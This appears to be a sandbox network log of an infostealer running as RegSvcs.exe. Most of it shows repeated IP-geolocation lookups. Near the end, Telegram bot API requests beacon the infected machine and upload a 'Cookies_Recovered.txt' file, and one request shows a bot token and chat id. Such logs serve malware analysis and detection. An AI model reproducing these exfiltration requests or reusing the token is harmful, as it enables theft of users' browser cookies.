server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1525&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1834170&cwnd=229&unsent_bytes=0&cid=f87d35a9e2b25681&ts=155&x=0"
2025-01-11 00:27:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49708 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:45 UTC | 858 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:45 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870054
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfKm8h1tOlklZMeGeHQv%2FmCVv%2ByJw7Q6IeKkw%2FZrEbN2shn1J9KS60oq2l7ab80bIzmLbo2KrmfA30jCXJ2CkYRDXbvJNxKUDm65uWsidLhytmc6oJSYInKivYPN3CO%2FySf%2BqLHe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c867cf6b42d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=389853&cwnd=229&unsent_bytes=0&cid=b90934e5e27d7e37&ts=142&x=0"
2025-01-11 00:27:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49710 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:46 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:46 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:46 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870055
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlY0bCywZCrEOGqbOTnKrt4oiyxrX6bNxGCt1vmtRugkHHlHfE4XqSyKk2YVhG8jk5wzvqG%2B2kjJAjcBYPIEUXKWl9k3qyU5fMMit%2FsL9DMwvcuJ4Td3zBCuz1xfL4YSRgrxkvPj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c870dde58c0f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2014&rtt_var=764&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1423001&cwnd=223&unsent_bytes=0&cid=5560e0442982f38e&ts=159&x=0"
2025-01-11 00:27:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49712 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:47 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:48 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:47 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870057
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEbT0c7%2FToglLINY73neD1PoQBzH2YQHOtxRR%2Flh9zp60IbshbnBivpwdMMgQno9zmW07uMvuDz8PAAw7nrKC1NVBt%2Bhvx3MW7cFv7wbyOSv9BcoOecp9%2B0N55WBOblEwDW%2BzmyA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c878ee607d0e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1936&rtt_var=736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476238&cwnd=244&unsent_bytes=0&cid=6c445f4a780736e7&ts=144&x=0"
2025-01-11 00:27:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49714 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:49 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:49 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870058
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBa9jFFbNzdhu7HpVyzQ9rR8dMQqCHV1FjjoTkfl3dPw96eKWyKzDsX5Q1Y3wPhCuv1AWeEUr5CS5%2ByX%2FcndFctyhvoM8z30O8%2FegqPIodGROu%2Bimg0WGo3a%2F5cZlO7SRFQlcTlM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c880fc2642d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1581&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1846932&cwnd=229&unsent_bytes=0&cid=82d7372aa6aae127&ts=130&x=0"
2025-01-11 00:27:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49717 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:50 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:50 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870059
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tbll4Q0QmSjbpghhGbU75v%2BGADHeXUX6ppZPrlhpNXe9%2BKK4XifgHDiEX%2Fw1nqVfSCG3q783yWcRZq4azG1Bgczle%2F1VSw8q8p5nhhjenygRyEC8gsMSgD2SqsnBJD3I1uz%2FyX5D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c889e9230f36-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1931216&cwnd=231&unsent_bytes=0&cid=2b4be71c133194fd&ts=269&x=0"
2025-01-11 00:27:50 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49730 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:51 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-11 00:27:52 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:52 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870061
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8G8ES1DE%2BlbX8nSk5ADfGYCMTI5yOn8R1aizXSg%2BzmtfoaOknjB8eIcC6ca1EPtGRYDWnmwKnX6nhoCr5%2BMUL2TIq%2F9Jv1FZ62WaIB2bpIjrbiZkNguTYPoX0ziToOwSHINn2KR%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c891e8b342d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1757977&cwnd=229&unsent_bytes=0&cid=ccb5f6c1b88d5732&ts=153&x=0"
2025-01-11 00:27:52 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49744 | 104.21.80.1 | 443 | 2804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 00:27:53 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 00:27:53 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1870062
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ahvDx83ivTLrKezJ2pokMFTdYHbXNKvKmiTRACJFGcgsuSQWM85lpwqucyLGIOT%2FX0GB72BOyMOEJT7qOjgF%2FMbCOKROWfWFvRiICXTldpoMCgJUpN1hKE4YPQPv3BXFTtFe%2F4T4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9000c89b6c1442d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1551&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1755862&cwnd=229&unsent_bytes=0&cid=e1895ebc1870994c&ts=411&x=0"
2025-01-11 00:27:53 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49749 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 2804 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:54 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-11 00:27:54 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 00:27:54 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 00:27:54 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 55414 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 6148 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:58 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-11 00:27:58 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 00:27:58 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1870067
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5D8dtSZnZNwa0UdJKasCPnekrnNozXfTxdSaa1InYF%2BuV3MMsgCpAccO1rzDuIuiUdD%2FJ66KTJV%2B1Y6cJ2VIV4LqODZyHE1Z2gcP8VLMHEB5tEa63aAWKjlpQ8KZ3JnR%2B4CZ7qEJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000c8ba2f5bc443-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1615&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1712609&cwnd=244&unsent_bytes=0&cid=25eefbd9d27cbefa&ts=173&x=0"
2025-01-11 00:27:58 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 55420 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 6148 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:27:59 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-11 00:27:59 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 00:27:59 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1870068
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tT6KzFEOOD8kBk6kdJraf8Rkd1BHZxJ4TyA8ubG9uFJZYMEA8g3KpOl%2F0vZRXrPDd6D6t2I6tHSj7oYssBeUA9uSUISVBN8bY1O76tCmsonm7Uh8XAaJaVwQuR9A5XODDLF3dfj0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000c8bf6ee38c0f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1949&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1483739&cwnd=223&unsent_bytes=0&cid=fa3ccdc18d3584fa&ts=162&x=0"
2025-01-11 00:27:59 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 55431 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 6148 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:28:00 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-11 00:28:00 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 00:28:00 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1870069
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXmF61woMiKNTKfT1fPcdDapc75BnlP2DlTxULD9SXbSZEzovmyf34ZqEq2NOiNVY2zjlCynjjq08HvlvotWwxRLjpt%2FwHlxepOHvPZvjXPNeAnLTgUcaF%2FBoOMDvctOidiedsLY"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000c8c79b5942d2-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1556&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1838790&cwnd=229&unsent_bytes=0&cid=0de15ada89e902b2&ts=142&x=0"
2025-01-11 00:28:00 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 55432 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 2804 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:28:00 UTC | 352 | OUT | POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
    Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285
    Host: api.telegram.org
    Content-Length: 1279
2025-01-11 00:28:00 UTC | 1279 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 36 63 35 66 39 63 37 32 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 37 36 34 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20
    Data Ascii: --------------------------8dd326c5f9c7285Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:376483Date and Time: 10/01/2025
2025-01-11 00:28:01 UTC | 346 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 00:28:00 GMT
    Content-Type: application/json
    Content-Length: 56
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 00:28:01 UTC | 56 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d
    Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 55443 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 6148 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 00:28:01 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-11 00:28:01 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 00:28:01 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1870070
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=botgIGwfUs42OYOBRuUZo0nPi4UUdIm7YzFy8Ct32fK1WDxl6OkI7t%2B2eKB7DpFxNyOOIIVrudFfcGtFGUCH5vEK41n62XPVUh1aWnVLkfMcj1mT4sHbonP72m3IN80m75Xg7lCP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000c8cf8d5242d2-EWR
